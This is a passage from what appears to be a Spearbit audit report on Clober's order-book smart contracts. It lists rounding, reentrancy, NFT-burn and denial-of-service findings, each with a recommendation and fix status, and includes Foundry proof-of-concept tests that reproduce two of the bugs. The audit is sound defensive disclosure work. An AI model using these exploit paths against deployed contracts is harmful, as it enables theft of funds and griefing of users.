1000000 = 77708.547 = 777709 Maker fees would be 13 377000 * 100011 / 1000000 = 37704.147 = 37705 400000 * 100011 / 1000000 = 40004.4 = 40005 which is 1 wei more than actually taken. Below is a foundry test to reproduce the problem, which can be inserted into Claim.t.sol: function testClaimFeesFailFromRounding() public { _createOrderBook(0, 100011); // 10.0011% taker fee // create 2 orders uint256 orderIndex1 = _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT); uint256 orderIndex2 = _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT); // take both orders _createTakeOrder(Constants.BID, 2 * Constants.RAW_AMOUNT); CloberOrderBook.OrderKey[] memory ids = new CloberOrderBook.OrderKey[](2); ids[0] = CloberOrderBook.OrderKey({ isBid: Constants.BID, priceIndex: Constants.PRICE_INDEX, orderIndex: orderIndex1 }); ids[1] = CloberOrderBook.OrderKey({ isBid: Constants.BID, priceIndex: Constants.PRICE_INDEX, orderIndex: orderIndex2 }); // perform claim orderBook.claim( address(this), ids ); // (uint128 quoteFeeBal, uint128 baseFeeBal) = orderBook.getFeeBalance(); // console.log(quoteFeeBal); // fee accounted = 20004 // console.log(baseFeeBal); // fee accounted = 0 // console.log(quoteToken.balanceOf(address(orderBook))); // actual fee collected = 20003 // try to claim fees, will revert vm.expectRevert("ERC20: transfer amount exceeds balance"); orderBook.collectFees(); } Recommendation: Consider rounding down the taker fee instead of rounding up. Clober: Fixed in PR 325. While checking this issue, I found that we should use rounding up at below 3 parts (pretty informative) to avoid loss of the protocol. 1. flash loan fee calculation: OrderBook.sol#L330-L331 2. dao fee calculation: OrderBook.sol#L839 3. maker fee(when makerFee > 0) calculation: OrderBook.sol#L476 Spearbit: Fixed. 14 +5.2.4 Drain tokens condition due to reentrancy in collectFees Severity: High Risk Context: OrderBook.sol#L800-L810 Description: collectFees function is not guarded by a re-entrancy guard. In case a transfer of at least one of the tokens in a trading pair allows to invoke arbitrary code (e.g. token implementing callbacks/hooks), it is possible for a malicious host to drain trading pools. The re-entrancy condition allows to transfer collected fees multiple times to both DAO and the host beyond the actual fee counter. Recommendation: Add re-entrancy guard to mitigate the issue in collectFees function or implement a check- effect-interaction pattern to update the balance before the transfer is executed. Clober: Fixed in commit 93b287d2. Spearbit: Verified. nonReentrant added. 5.3 Medium Risk +5.3.1 Group claim clashing condition Severity: Medium Risk Context: OrderBook.sol#L685 Description: Claim functionality is designed to support 3rd party operators to claim multiple orders on behalf of market's users to finalise the transactions, deliver assets and earn bounties. The code allows to iterate over a list of orders to execute _claim. function claim(address claimer, OrderKey[] calldata orderKeys) external nonReentrant revertOnDelegateCall { uint32 totalBounty = 0; for (uint256 i = 0; i < orderKeys.length; i++) { ... (uint256 claimedTokenAmount, uint256 minusFee, uint64 claimedRawAmount) = _claim( queue, mOrder, orderKey, claimer ); ... } } However, neither claim nor _claim functions in OrderBook support skipping already fulfilled orders. On the con- trary in case of a revert in _claim the whole transaction is reverted. function _claim(...) private returns (...) { ... require(mOrder.openOrderAmount > 0, Errors.OB_INVALID_CLAIM); ... } Such implementation does not support fully the initial idea of 3rd party operators claiming orders in batches. A transaction claiming multiple orders at once can easily clash with others and be reverted completely, effectively claiming nothing - just wasting gas. Clashing can happen for instance when two bots got overlapping lists of orders or when the owner of the order decides to claim or cancel his/her order manually while the bot is about to claim it as well. 15 Recommendation: It is recommended to consider skipping already claimed orders to resolve described clashing claims cases. Clober: Fixed PR 338. Spearbit: Verified. claim is skipping orders which could cause revert in _claim. Other functions invoking claim do have a proper check before _claim is invoked thus are not affected. +5.3.2 Order owner isn't zeroed after burning Severity: Medium Risk Context: OrderBook.sol#L821-L823 OrderNFT.sol#L78-L82 OrderNFT.sol#L189 Description: The order's owner is not zeroed out when the NFT is burnt. As a result, while the onBurn() method records the NFT to have been transferred to the zero address, ownerOf() still returns the current order's owner. This allows for unexpected behaviour, like being able to call approve() and safeTransferFrom() functions on non-existent tokens. A malicious actor could sell such resurrected NFTs on secondary exchanges for profit even though they have no monetary value. Such NFTs will revert on cancellation or claim attempts since openOrderAmount is zero. function testNFTMovementAfterBurn() public { _createOrderBook(0, 0); address attacker2 = address(0x1337); // Step 1: make 2 orders to avoid bal sub overflow when moving burnt NFT in step 3 uint256 orderIndex1 = _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT); _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT); CloberOrderBook.OrderKey memory orderKey = CloberOrderBook.OrderKey({ isBid: Constants.BID, priceIndex: Constants.PRICE_INDEX, orderIndex: orderIndex1 }); uint256 tokenId = orderToken.encodeId(orderKey); // Step 2: burn 1 NFT by cancelling one of the orders vm.startPrank(Constants.MAKER); orderBook.cancel( Constants.MAKER, _toArray(orderKey) ); // verify ownership is still maker assertEq(orderToken.ownerOf(tokenId), Constants.MAKER, "NFT_OWNER"); // Step 3: resurrect burnt token by calling safeTransferFrom orderToken.safeTransferFrom( Constants.MAKER, attacker2, tokenId ); // verify ownership is now attacker2 assertEq(orderToken.ownerOf(tokenId), attacker2, "NFT_OWNER"); } Recommendation: The owner should be zeroed in _burnToken(). 16 function _burnToken(OrderKey memory orderKey) internal { CloberOrderNFT(orderToken).onBurn(orderKey.isBid, orderKey.priceIndex, orderKey.orderIndex); + _getOrder(orderKey).owner = address(0); } Clober: Fixed in PR 334. Spearbit: Verified. The owner of the order is correctly zeroed in the OrderBook after burning the NFT. +5.3.3 Lack of two-step role transfer Severity: Medium Risk Context: MarketFactory.sol#L146-L152 MarketFactory.sol#L137-L140 Description: The contracts lack two-step role transfer. Both the ownership of the MarketFactory as well as the change of market's host are implemented as single-step functions. The basic validation whether the address is not a zero address for a market is performed, however the case when the address receiving the role is inaccessible is not covered properly. Taking into account the handOverHost can be invoked without any supervision, by anyone who created the market it is possible to make a typo unintentionally or intentionally if the attacker wants simply to brick fees collection as currently the host affects collectFees in OrderBook (described as a separate issue). The ownership transfer in theory should be less error-prone as it should be done by DAO with great care, however still two-step role transfer should be preferable. Recommendation: It is recommended to implement a two-step role transfer where the role recipient is set and then the recipient has to claim that role to finalise the role transfer. Clober: Fixed in PR 322. Spearbit: Verified. Two-step role transfers added for contract's owner and market's host. +5.3.4 Atomic fees delivery susceptible to funds lockout Severity: Medium Risk Context: OrderBook.sol#L791-L798 OrderBook.sol#L804-L805 Description: The collectFees function delivers the quoteToken part of fees as well as the baseToken part of fees atomically and simultaneously to both the DAO and the host. In case a single address is for instance blacklisted (e.g. via USDC blacklist feature) or a token in a pair happens to be malicious and configured the way transfer to one of the addresses reverts it is possible to block fees delivery. 17 function collectFees() external nonReentrant { // @audit delivers both tokens atomically require(msg.sender == _host(), Errors.ACCESS); if (_baseFeeBalance > 1) { _collectFees(_baseToken, _baseFeeBalance - 1); _baseFeeBalance = 1; } if (_quoteFeeBalance > 1) { _collectFees(_quoteToken, _quoteFeeBalance - 1); _quoteFeeBalance = 1; } } function _collectFees(IERC20 token, uint256 amount) internal { // @audit delivers to both wallets uint256 daoFeeAmount = (amount * _DAO_FEE) / _FEE_PRECISION; uint256 hostFeeAmount = amount - daoFeeAmount; _transferToken(token, _daoTreasury(), daoFeeAmount); _transferToken(token, _host(), hostFeeAmount); } There are multiple cases when such situation can happen for instance: a malicious host wants to block the function for DAO to prevent collecting at least guaranteed valuable quoteToken or a hacked DAO can swap treasury to some invalid address and renounce ownership to brick collectFees across multiple markets. Taking into account the current implementation in case it is not possible to transfer tokens it is necessary to swap the problematic address, however depending on the specific case it might be not trivial. Recommendation: It is recommended to parametrize collectFee to choose a token to collect and keep separate counters of delivered fees. Clober: Fixed in PR 359. Spearbit: Verified. The function was parametrized to deliver a given token to a single recipient. +5.3.5 DAO fees potentially unavailable due to overly strict access control Severity: Medium Risk Context: OrderBook.sol#L790 Description: The collectFees function is guarded by an inline access control require statement condition which prevents anyone, except a host, from invoking the function. Only the host of the market is authorized to invoke, effectively deliver all collected fees, including the part of the fees belonging to the DAO. function collectFees() external nonReentrant { require(msg.sender == _host(), Errors.ACCESS); // @audit only host authorized if (_baseFeeBalance > 1) { _collectFees(_baseToken, _baseFeeBalance - 1); _baseFeeBalance = 1; } if (_quoteFeeBalance > 1) { _collectFees(_quoteToken, _quoteFeeBalance - 1); _quoteFeeBalance = 1; } } This access control is too strict and can lead to funds being locked permanently in the worst case scenario. As the host is a single point of failure in case access to the wallet is lost or is incorrectly transferred the fees for both the host and the DAO will be locked. Recommendation: It is recommended to remove the access control from collectFees function as collected fees are transferred to fixed addresses being the host and the treasury. In such setup anyone should be able to invoke the function and trigger collected fees delivery at any time and it should not be limited only to the host of the market. 18 Clober: Fixed in PR 315. Spearbit: Verified. Authorization modified. Everyone can trigger the function. 5.4 Low Risk +5.4.1 OrderNFT ownership and market host transfers are done separately Severity: Low Risk Context: MarketFactory.sol#L146-L152 OrderNFT.sol#L15 Description: The market host is entitled to 80% of the fees collected, and is able to set the URI of the correspond- ing orderToken NFT. However, transferring the market host and the orderToken NFT is done separately. It is thus possible for a market host to transfer one but not the other. Recommendation: Tightly couple the NFT ownership with the market host stored in MarketFactory. Clober: Fixed PR 345. Spearbit: _factory.getMarketHost(market). Fixed. OrderNFT no longer inherits Ownable; onlyOwner has been replaced with +5.4.2 OrderNFTs can be renamed Severity: Low Risk Context: OrderNFT.sol#L53-L59 Description: The OrderNFT contract's name and symbol can be changed at any time by the market host. Usually, these fields are immutable for ERC721 NFTs. There might be potential issues with off-chain indexers that cache only the original value. Furthermore, suddenly renaming tokens by a malicious market host could lead to web2 phishing attacks. Recommendation: If there is no good usecase for the renaming functionality, consider removing these functions and only setting the name and symbol in its init function. Clober: Fixed in PR 335. Spearbit: Fixed. +5.4.3 DOSing _replaceStaleOrder() due to reverting on token transfer Severity: Low Risk Context: OrderBook.sol#L676-L677 Description: In the case of tokens with implemented hooks, a malicious order owner can revert on token received event thus cause a denial-of-service via _replaceStaleOrder(). The probability of such an attack is very low, because the order queue has to be full and it is unusual for tokens to implement hooks. Recommendation: Use a blacklist/whitelist system to filter out non-standard tokens. In case the recommendation is implemented only partially, consider implementing in the UI a proper warnings for known malicious tokens, so end-users can easily identify which assets should be avoided. Clober: Fixed in PR 363. Allow list was implemented in the MarketFactory for a quoteToken. The _replaceS- taleOrder function was removed and the logic was replaced to be non-blocking to resolve this as well as other denial-of-service conditions. Spearbit: Currently the implementation allows only to create a market where a quoteToken is among whitelisted assets. It is possible, at any time, to prevent creating new markets (OrderBooks) for any given quoteToken as the allow list can be updated at any time by the owner, what can potentially be used to censor some types of markets if abused. This however, affects neither already created markets nor baseToken. The latter currently is not restricted. 19 It was verified the modifications to replace stale orders is no longer blocking, preventing successful exploitation of malicious hooks. +5.4.4 Total claimable bounties may exceed type(uint32).max Severity: Low Risk Context: OrderBook.sol#L209 OrderBook.sol#L218 OrderBook.sol#L279 OrderBook.sol#L301 Description: Individual bounties are capped to type(uint32).max which is ~4.295 of a native token of 18 decimals (4.2949673e18 wei). It's possible (and likely in the case of Polygon network) for their sum to therefore exceed type(uint32).max. Recommendation: Change the totalCanceledBounty and totalBounty variable types to uint64. - uint32 totalCanceledBounty = 0; + uint64 totalCanceledBounty = 0; - uint32 totalBounty = 0; + uint64 totalBounty = 0; Clober: Fixed in PR 340. Spearbit: Fixed. Variable type has been changed to uint256. Moreover, the addition to these variables are made unchecked, hence it is extremely unlikely for overflow to occur. // overflow when length == 2**224 > 2 * size(priceIndex) * _MAX_ORDER, absolutely never happening unchecked { totalCanceledBounty += claimBounty; } // overflow when length == 2**224 > 2 * size(priceIndex) * _MAX_ORDER, absolutely never happening unchecked { totalBounty += mOrder.claimBounty; } +5.4.5 Can fake market order in TakeOrder event Severity: Low Risk Context: OrderBook.sol#L169 Description: Market orders in Orderbook.marketOrder set the 8-th bit of options. This options value is later used in _take's TakeOrder event. However, one can call Orderbook.limitOrder with this 8-th bit set and spoof a market order event. Recommendation: Consider clearing unused bits from options // limit options = options & 0x03 // market options = (options | 0x80) & 0x83 Clober: Fixed in commit e2b25d49. Spearbit: Fixed. 20 +5.4.6 _priceToIndex will revert if price is type(uint128).max Severity: Low Risk Context: GeometricPriceBook.sol#L82 Description: Because price is type uint128, the increment will overflow first before it is casted to uint256 uint256 shiftedPrice = uint256(price + 1) << 64; Recommendation: Cast price to uint256 first - uint256 shiftedPrice = uint256(price + 1) << 64 + uint256 shiftedPrice = (uint256(price) + 1) << 64 Clober: Fixed in PR 367. Spearbit: Verified. Recommended casting applied in PR, but not applied to the main branch by the end of the fixing time window. +5.4.7 using block.chainid for create2 salt can be problematic if there's chain hardfork Severity: Low Risk Context: MarketFactory.sol#L182 StableMarketDeployer.sol#L30 VolatileMarketDeployer.sol#L28 MarketFactory.sol#L155 Description: Using block.chainid as salt for create2 can result in inconsistency if there is a chain split event(eg. eth2 merge). This will make 2 different chains that has different chainid(one with original chain id and one with random new value). Which will result in making one of the chains not able to interact with markets, nfts properly. Also, it will make things hard to do a fork testing which changes chainid for local environment. Recommendation: Cache block.chainId as private immutable value _chainId or just don't use block.chainId as create2 salt. Clober: Fixed in PR 331. Spearbit: Fixed. block.chainId is cached in _cachedChainId. 5.5 Gas Optimization +5.5.1 Use get64Unsafe() when updating claimable in take() Severity: Gas Optimization Context: OrderBook.sol#L588-L593 Description: get64Unsafe() can be used when fetching the stored claimable value since _getClaimableIndex() returns elementIndex < 4 Recommendation: Consider applying the following change claimable[groupIndex] = claimableGroup.update64Unsafe( elementIndex, claimableGroup.get64(elementIndex).addClean(takenRawAmount) claimableGroup.get64Unsafe(elementIndex).addClean(takenRawAmount) - + ); Clober: Fixed in commit ce0e2513. Spearbit: Fixed. 21 +5.5.2 Check is zero is cheaper than check if the result is a concrete value Severity: Gas Optimization Context: SignificantBit.sol#L14 Description: Checking if the result is zero vs. checking if the result is/isn't a concrete value should save 1 opcode. Recommendation: Consider applying the following change - x & 1 != 1 + x & 1 == 0 Clober: Fixed in PR 36. Spearbit: Fixed. +5.5.3 Function argument can be skipped Severity: Gas Optimization Context: OrderBook.sol#L240 Description: The address caller parameter in the internal _cancel function can be replaced with msg.sender as effectively this is the value that is actually used when the function is invoked. Recommendation: Remove caller argument from _cancel function. it Additionally, is recommended to do a similar change and replace CloberMarketSwapCallbackRe- ceiver(callbackReceiver) to CloberMarketSwapCallbackReceiver(msg.sender) to simplify the code and the security analysis. Clober: Fixed in commit c43c3a04 and PR 360. Spearbit: Verified. Both recommendations applied. +5.5.4 Redundant flash loan balance cap Severity: Gas Optimization Context: OrderBook.sol#L323-L330 Description: The requested flash loan amounts are checked against and capped up to the contract's token bal- ances, so the caller has to validate and handle the case where the tokens received are below the requested amounts. It would be better to optimize for the success case where there are sufficient tokens. Otherwise, let the function revert from failure to transfer the requested tokens instead. Recommendation: Remove the check against the contract's token balances. quoteAmount = beforeQuoteAmount; - if (quoteAmount > beforeQuoteAmount) { - - } - if (baseAmount > beforeBaseAmount) { - - } baseAmount = beforeBaseAmount; Clober: Fixed PR 342. Spearbit: Fixed. 22 +5.5.5 Do direct assignment to totalBaseAmount and totalQuoteAmount Severity: Gas Optimization Context: OrderBook.sol#L303-L309 Description: While iterating through multiple claims, totalBaseAmount and totalQuoteAmount are reset and as- signed a value each iteration. Since they are only incremented in the referenced block (and are mutually exclusive cases), the assignment can be direct instead of doing an increment. Recommendation: Do a direct assignment to totalBaseAmount and totalQuoteAmount instead of the += opera- tion. Clober: Fixed PR 313. Spearbit: Fixed. +5.5.6 Redundant zero minusFee setter Severity: Gas Optimization Context: OrderBook.sol#L724 Description: minusFee defaults to zero, so the explicit setting of it is redundant. Recommendation: While can be removed, it is recommended to change it as a comment for clarity. Clober: Fixed PR 313. Spearbit: Fixed. +5.5.7 Load _FEE_PRECISION into local variable before usage Severity: Gas Optimization Context: OrderBook.sol#L331-L332 Description: Loading _FEE_PRECISION into a local variable slightly reduced bytecode size (0.017kB) and was found to be a tad more gas efficient. Recommendation: + uint256 feePrecision = _FEE_PRECISION; - uint256 quoteFeeAmount = (quoteAmount * takerFee) / _FEE_PRECISION; - uint256 baseFeeAmount = (baseAmount * takerFee) / _FEE_PRECISION; + uint256 quoteFeeAmount = (quoteAmount * takerFee) / feePrecision; + uint256 baseFeeAmount = (baseAmount * takerFee) / feePrecision; Clober: Fixed in PR 313. Spearbit: Fixed. 23 +5.5.8 Can cache value difference in SegmentedSegmentTree464.update Severity: Gas Optimization Context: SegmentedSegmentTree464.sol#L160, SegmentedSegmentTree464.sol#L170 Description: The replaced - value expression in SegmentedSegmentTree464.pop is recomputed several times in each loop iteration. Recommendation: Consider caching the value for both loops. uint64 diff = replaced - value; Clober: Fixed in commit 3e9e6b16. Spearbit: Fixed. +5.5.9 Unnecessary loop condition in pop Severity: Gas Optimization Context: SegmentedSegmentTree464.sol#L84 Description: The loop variable l in SegmentedSegmentTree464.pop is an unsigned int, so the loop condition l >= 0 is always true. The reason why it still terminates is that the first layer only has group index 0 and 1, so the rightIndex.group - leftIndex.group < 4 condition is always true when the first layer is reached, and then it terminates with the break keyword. Recommendation: This loop condition is not necessary and can be removed. Clober: Fixed in commit 22055e96. Spearbit: Fixed. +5.5.10 Use same comparisons for children in heap Severity: Gas Optimization Context: OctopusHeap.sol#L237 Description: The pop function compares one child with a strict inequality (<) and the other with less than or equals (<=). A heap doesn't guarantee order between the children and there are no duplicate nodes (wordIndexes). Recommendation: Use < for both comparisons - if (leftChildWordIndex > wordIndex && rightChildWordIndex >= wordIndex) { + if (leftChildWordIndex > wordIndex && rightChildWordIndex > wordIndex) { Clober: Fixed in commit 2cbeae15. Spearbit: Fixed. 24 +5.5.11 Gas optimization for OctopusHeap.pop's newLength computation Severity: Gas Optimization Context: OctopusHeap.sol#L224 Description: The newLength computation relies on an underflow in the lower bits to wrap from "length of 256" (= stored 0 and heap is not empty) to 255. The code can be made more clear and optimized. unchecked { newLength = uint8(head) - 1; } Clober: Fixed in commit 2cbeae15. Spearbit: Fixed. +5.5.12 Gas optimization for OctopusHeap.root Severity: Gas Optimization Context: OctopusHeap.sol#L174 Description: The code can be optimized by using or instead of checked addition - return (uint16(wordIndex) << 8) + bitIndex; + return (uint16(wordIndex) << 8) | bitIndex; Clober: Fixed in commit 2cbeae15. Spearbit: Fixed. +5.5.13 No need for explicit assignment with default values Severity: Gas Optimization Context: OrderBook.sol#L126-L127 OrderBook.sol#L218-L220 OrderBook.sol#L290 OrderBook.sol#L308-L309 OrderBook.sol#L561-L562 OrderBook.sol#L695 Description: Explicitly assigning ZERO value (or any default value) costs gas, but is not needed. Recommendation: Skip init assignments with 0 values. Clober: Addressed in PR 313 and PR 360. Spearbit: Fixed, except for an instance in the _take() function where the removal oddly increases the bytecode size with no change in gas usage. +5.5.14 Prefix increment is more efficient than postfix increment Severity: Gas Optimization Context: Orderbook.sol#L210 OrderBook.sol#L280 OrderBook.sol#L530 Description: The prefix increment reduces bytecode size by a little, and is slightly more gas efficient. Recommendation: Implement the following - i++ + ++i - ret += 1 + ++ret; 25 Clober: Fixed in PR 313. Spearbit: Fixed. +5.5.15 Tree update can be avoided for fully filled orders Severity: Gas Optimization Context: OrderBook.sol#L262-L267 Description: For fully filled orders, remainingAmount will be 0 (openOrderAmount == claimedRawAmount), so the tree update can be skipped since the new value is the same as the old value. Hence, the code block can be moved inside the if (remainingAmount > 0) code block. Recommendation: Shift the tree update call to inside the if (remainingAmount > 0) code block. Clober: Fixed in PR 313. Spearbit: Fixed. +5.5.16 Shift msg.value cap check for earlier revert Severity: Gas Optimization Context: OrderBook.sol#L118 Description: The cap check on msg.value should be shifted up to the top of the function so that failed checks will revert earlier, saving gas in these cases. Recommendation: Shift the check up before the isBid and bountyRefundAmount initialisations . Clober: Fixed in PR 313. Spearbit: Fixed. +5.5.17 Solmate's ReentrancyGuard is more efficient than OpenZeppelin's Severity: Gas Optimization Context: OrderBook.sol#L8 Description: Solmate's ReentrancyGuard provides the same functionality as OpenZeppelin's version, but is more efficient as it reduces the bytecode size by 0.11kB, which can be further reduced if its require statement is modified to revert with a custom error. Recommendation: Use Solmate's ReentrancyGuard instead. Clober: Changed in PR 305. Spearbit: Fixed. Modified Solmate's ReentrancyGuard to use custom error instead of require statement. +5.5.18 r * r is more gas efficient than r ** 2 Severity: Gas Optimization Context: GeometricPriceBook.sol#L31-L47 Description: It's more gas efficient to do r * r instead of r ** 2, saving on deployment cost. Recommendation: Replace the instances of r ** 2 to r * r. Clober: Fixed in commit 941d688f. Spearbit: Fixed. 26 +5.5.19 Update childHeapIndex and shifter initial values to constants Severity: Gas Optimization Context: OctopusHeap.sol#L233 SegmentedSegmentTree464.sol#L42 SegmentedSegmentTree464.sol#L180 Description: The initial values of childHeapIndex and shifter can be better hardcoded to avoid redundant operations. Recommendation: Implement the following changes: • OctopusHeap - uint16 childHeapIndex = _getLeftChildHeapIndex(heapIndex); + uint16 childHeapIndex = 2; • SegmentedSegmentTree464 - uint256 private constant _MAX_NODES_P = 15; + uint256 private constant _MAX_NODES_P_MINUS_ONE = 14; - uint256 shifter = _MAX_NODES_P - 1 + uint256 shifter = _MAX_NODES_P_MINUS_ONE Clober: Fixed PR 39. Spearbit: Fixed. +5.5.20 Same value tree update falls under else case which will do redundant overflow check Severity: Gas Optimization Context: SegmentedSegmentTree464.sol#L153 Description: In the case where value and replaced are equal, it currently will fall under the else case which has an addition overflow check that isn't required in this scenario. In fact, the tree does not need to be updated at all. Recommendation: One could combine the equality case with the if case, do an early return, or ensure that the function is only called when there is a difference in values. - if (replaced > value) + if (replaced >= value) Clober: Fixed in commit 3e9e6b16. Spearbit: Fixed. +5.5.21 Unchecked code blocks Severity: Gas Optimization Context: OrderBook.sol#L581-L582 OctopusHeap.sol#L242 SegmentedSegmentTree464.sol#L153-L174 OrderBook.sol#L351-L352 Description: The mentioned code blocks can be performed without native math overflow / underflow checks because they have been checked to be so, or the min / max range ensures it. Recommendation: Wrap the referenced blocks with unchecked {}. Clober: Fixed orderbook instance at PR 313 and SegmentedSegmentTree instance PR 36. Spearbit: Fixed. 27 +5.5.22 Unused Custom Error Severity: Gas Optimization Context: SegmentedSegmentTree464.sol#L30 Description: error TreeQueryIndexOrder(); is defined but unused. Recommendation: Remove the unused error. Clober: Deleted in commit 46a0b6b1. Spearbit: Fixed. 5.6 Informational +5.6.1 Markets with malicious tokens should not be interacted with Severity: Informational Context: MarketRouter.sol#L34 Description: The Clober protocol is permissionless and allows anyone to create an orderbook for any base token. These base tokens can be malicious and interacting with these markets can lead to loss of funds in several ways. For example, a token with custom code / a callback to an arbitrary address on transfer can use the pending ETH that the victim supplied to the router and trade it for another coin. The victim will lose their ETH and then be charged a second time using their WETH approval of the router. Recommendation: Users need to be aware that trading on a market with an unknown token can lead to loss of funds. Clober: Acknowledged. Spearbit: Acknowledged. +5.6.2 Claim bounty of stale orders should be given to user instead of daoTreasury Severity: Informational Context: OrderBook.sol#L656-L662 OrderBook.sol#L667 Description: When an unclaimed stale order is being replaced, the claimBounty is sent to the DAO treasury. However, since the user is the one executing the claim on behalf of the stale order owner, and is paying the gas for it, the claimBounty should be sent to him instead. Recommendation: Change the claimer from the treasury to user. Clober: Fixed PR 347. Spearbit: Issue is no longer applicable because claims have been decoupled with replacement of stale orders. +5.6.3 Misleading comment on remainingRequestedRawAmount Severity: Informational Context: OrderBook.sol#L130-L133 Description: The comment says // always ceil, but remainingRequestedRawAmount is rounded down when the base / quote amounts are converted to the raw amount. Recommendation: Consider applying the following change - // always ceil + // always floor 28 Clober: Fixed commit 557ca41d. Spearbit: Fixed. +5.6.4 Potential DoS if quoteUnit and index to price functions are set to unreasonable values Severity: Informational Context: OrderBook.sol#L565 Description: There are some griefing and DoS (denial-of-service) attacks for some markets that are created with bad quoteUnit and pricing functions. 1. A market order uses _take to iterate over several price indices until the order is filled. An attacker can add a tiny amount of depth to many indices (prices), increasing the gas cost and in the worst case leading to out-of-gas transactions. 2. There can only be MAX_ORDER_SIZE (32768) different orders at a single price (index). Old orders are only replaced if the previous order at the index has been fully filled. A griefer or a market maker trying to block their competition can fill the entire order queue for a price. This requires 32768 * quoteUnit quote tokens. Recommendation: To mitigate the first issue, the chosen index-to-price function for two neighbouring price indices should also lead to an increase in price that is not too small. The second issue can be mitigated and be made unprofitable by choosing a quoteUnit large enough such that 32768 * quoteUnit is of significant value. Clober: clober-dex/core/issues/369. Described cases will be covered in the documentation. The progress is tracked in Spearbit: Acknowledged. +5.6.5 Rounding rationale could be better clarified Severity: Informational Context: OrderBook.sol#L579-L582 Description: The rationale for rounding up / down was easier to follow if tied to the expendInput option instead. Recommendation: // Rounds down if expendInput, rounds up if expendOutput // Bid & expendInput => taking ask & expendInput => rounds down (user specified quote) // Bid & expendOutput => taking ask & expendOutput => rounds up (user specified base) // Ask & expendInput => taking bid & expendInput => rounds down (user specified base) // Ask & expendOutput => taking bid & expendOutput => rounds up (user specified quote) Clober: Also, the logic looks better to change as below: uint64 remainingRawAmount = isTakingBidSide == expendInput ? _baseToRaw(requestedAmount - filledAmount, currentIndex, !expendInput) : _quoteToRaw(requestedAmount - filledAmount, !expendInput); Fixed in PR 313. Spearbit: Fixed. 29 +5.6.6 Rename flashLoan() for better composability & ease of integration Severity: Informational Context: OrderBook.sol#L317 Description: For ease of 3rd party integration, consider renaming to flash(), as it would then have the same function sig as Uniswap V3, although the callback function would still be different. Recommendation: - flashLoan( + flash( Clober: Fixed in PR 326. Spearbit: Fixed. +5.6.7 Unsupported tokens: tokens with more than 18 decimals Severity: Informational Context: OrderBook.sol#L102 Description: The orderbook does currently not support tokens with more than 18 decimals. However, having more than 18 decimals is very unusual. Recommendation: Consider if there are any non-standard tokens that you might want to support. As the protocol is permissionless, consider documenting that only standard tokens should be used as quote and base tokens and that the protocol does not support non-standard tokens, like tokens with more than 18 decimals, fee-on-transfer tokens, rebasing tokens, etc. Clober: clober-dex/core/issues/369. Described cases will be covered in the documentation. The progress is tracked in Spearbit: Acknowledged. +5.6.8 ArithmeticPriceBook and GeometricPriceBook contracts should be abstract Severity: Informational Context: GeometricPriceBook.sol, ArithmeticPriceBook.sol Description: The ArithmeticPriceBook and GeometricPriceBook contracts don't have any external functions. Recommendation: Consider making these contracts abstract. Clober: Fixed in commit 300b1986. Spearbit: Fixed. +5.6.9 childRawIndex in OctopusHeap.pop is not a raw index Severity: Informational Context: OctopusHeap.sol#L231 Description: The OctopusHeap uses raw and heap indices. Raw indices are 0-based (root has raw index 0) and iterate the tree top to bottom, left to right. Heap indices are 1-based (root has heap index 0) and iterate the head left to right, top to bottom, but then iterate the remaining nodes octopus arm by arm. A mapping between the raw index and heap index can be obtained through _convertRawIndexToHeapIndex. The pop function defines a childRawIndex but this variable is not a raw index, it's actually raw index + 1 (1-based). 30 Recommendation: The algorithm works correctly on the wrongly named variable which makes it look confus- ing. Either rename the variable to childRawIndex1Based or rewrite the algorithm to correctly use raw indices (preferred). Note that the leftChild(index) function is different for 0- and 1-based indices: leftChild(index0Based) = 2 * index + 1 leftChild(index1Based) = 2 * index function pop(Core storage core) internal { (uint8 rootWordIndex, uint8 rootBitIndex) = _root(core); uint256 mask = 1 << rootBitIndex; uint256 word = core.bitmap[rootWordIndex]; if (word == mask) { uint256 head = core.heap[0]; uint8 newLength = uint8(head - 1); if (newLength == 0) { core.heap[0] = _INIT_VALUE; } else { uint256 arm; uint8 wordIndex = _getWordIndex(core, _convertRawIndexToHeapIndex(newLength)); uint16 heapIndex = 1; uint16 childRawIndex = 2; uint16 childRawIndex = 1; // left-child of root uint16 bodyPartIndex; uint16 childHeapIndex = _getLeftChildHeapIndex(heapIndex); while (childRawIndex <= newLength) { while (childRawIndex < newLength) { // 0-based so < instead of <= uint8 leftChildWordIndex = _getWordIndex(head, arm, childHeapIndex); uint8 rightChildWordIndex = _getWordIndex(head, arm, childHeapIndex + 1); if (leftChildWordIndex > wordIndex && rightChildWordIndex >= wordIndex) { break; } else if (leftChildWordIndex > rightChildWordIndex) { (head, arm) = _updateWordIndex(head, arm, heapIndex, rightChildWordIndex); heapIndex = childHeapIndex + 1; childRawIndex = (childRawIndex + 1) << 1; childRawIndex = (childRawIndex << 1) + 3; // leftChild(childRawIndex + 1) } else { (head, arm) = _updateWordIndex(head, arm, heapIndex, leftChildWordIndex); heapIndex = childHeapIndex; childRawIndex <<= 1; childRawIndex (childRawIndex << 1) + 1; // leftChild(childRawIndex) - + - + - + - + } childHeapIndex = _getLeftChildHeapIndex(heapIndex); if (childHeapIndex > _HEAD_SIZE && bodyPartIndex == 0) { // child in arm bodyPartIndex = childHeapIndex >> _HEAD_SIZE_M; arm = core.heap[bodyPartIndex]; } } (head, arm) = _updateWordIndex(head, arm, heapIndex, wordIndex); unchecked { if (uint8(head) == 0) { core.heap[0] = head + 255; // decrement length by 1 } else { core.heap[0] = head - 1; // decrement length by 1 } } if (bodyPartIndex > 0) { core.heap[bodyPartIndex] = arm; } } } 31 core.bitmap[rootWordIndex] = word & (~mask); } Consider renaming _ROOT_INDEX to _ROOT_HEAP_INDEX to make it more clear what kind of index this variable is. Clober: Fixed in PR 37. Spearbit: Fixed. Recommendation was implemented, and _ROOT_INDEX has been renamed to _ROOT_HEAP_INDEX. +5.6.10 Lack of orderIndex validation Severity: Informational Context: OrderNFT.sol#L271 Description: The orderIndex parameter in the OrderNFT contract is missing proper validation. Realistically the value should never exceed type(uint232).max as it is passed from the OrderBook contract, however, future changes to the code might potentially cause encoding/decoding ambiguity. Recommendation: Add proper validation. require(orderIndex <= type(uint232).max); Clober: Fixed in PR 353. Spearbit: Verified. Validation added. By the end of the fixing stage the contract was refactored and the encod- ing/decoding functionality was moved to the OrderKey.sol library keeping the same validation logic. +5.6.11 Unsafe _getParentHeapIndex, _getLeftChildHeapIndex Severity: Informational Context: OctopusHeap.sol#L135 OctopusHeap.sol#L156 